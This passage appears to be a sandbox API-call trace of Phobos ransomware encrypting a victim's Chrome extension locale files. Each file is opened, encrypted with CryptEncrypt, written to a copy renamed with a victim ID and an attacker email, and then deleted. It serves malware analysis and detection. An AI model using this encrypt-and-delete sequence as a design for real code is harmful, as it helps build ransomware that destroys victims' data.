(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.271] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.271] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.272] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.272] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.272] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.272] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xd7, lpOverlapped=0x0) returned 1 [0148.273] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0148.273] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0148.274] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.274] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.274] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.274] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.274] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.274] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.274] CloseHandle (hObject=0x188) returned 1 [0148.274] CloseHandle (hObject=0x148) returned 1 [0148.274] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\messages.json")) returned 1 [0148.275] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.275] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.276] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=223) returned 1 [0148.276] CloseHandle (hObject=0x148) returned 1 [0148.276] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json")) returned 0x2020 [0148.276] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.276] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.276] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.276] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.276] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.276] ReadFile (in: hFile=0x148, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xdf, lpOverlapped=0x0) returned 1 [0148.279] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0148.279] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0148.279] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.279] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.280] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.280] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.280] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.280] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.280] CloseHandle (hObject=0x148) returned 1 [0148.280] CloseHandle (hObject=0x188) returned 1 [0148.280] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json")) returned 1 [0148.281] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.281] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=221) returned 1 [0148.281] CloseHandle (hObject=0x188) returned 1 [0148.281] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json")) returned 0x2020 [0148.281] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.282] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.282] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.282] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.282] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.282] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xdd, lpOverlapped=0x0) returned 1 [0148.283] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0148.283] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0148.284] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.284] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.284] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.284] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.284] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.284] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.284] CloseHandle (hObject=0x188) returned 1 [0148.284] CloseHandle (hObject=0x148) returned 1 [0148.284] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json")) returned 1 [0148.285] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.285] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.286] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=214) returned 1 [0148.286] CloseHandle (hObject=0x148) returned 1 [0148.286] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json")) returned 0x2020 [0148.286] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.286] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.286] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.287] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.287] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.287] ReadFile (in: hFile=0x148, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xd6, lpOverlapped=0x0) returned 1 [0148.288] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0148.288] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0148.289] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.289] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.289] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.289] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.289] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.289] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.289] CloseHandle (hObject=0x148) returned 1 [0148.289] CloseHandle (hObject=0x188) returned 1 [0148.289] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json")) returned 1 [0148.290] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.290] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.290] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=217) returned 1 [0148.290] CloseHandle (hObject=0x188) returned 1 [0148.290] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json")) returned 0x2020 [0148.291] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.291] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.291] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.291] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.291] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.291] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.291] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.291] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xd9, lpOverlapped=0x0) returned 1 [0148.292] CryptEncrypt (in: 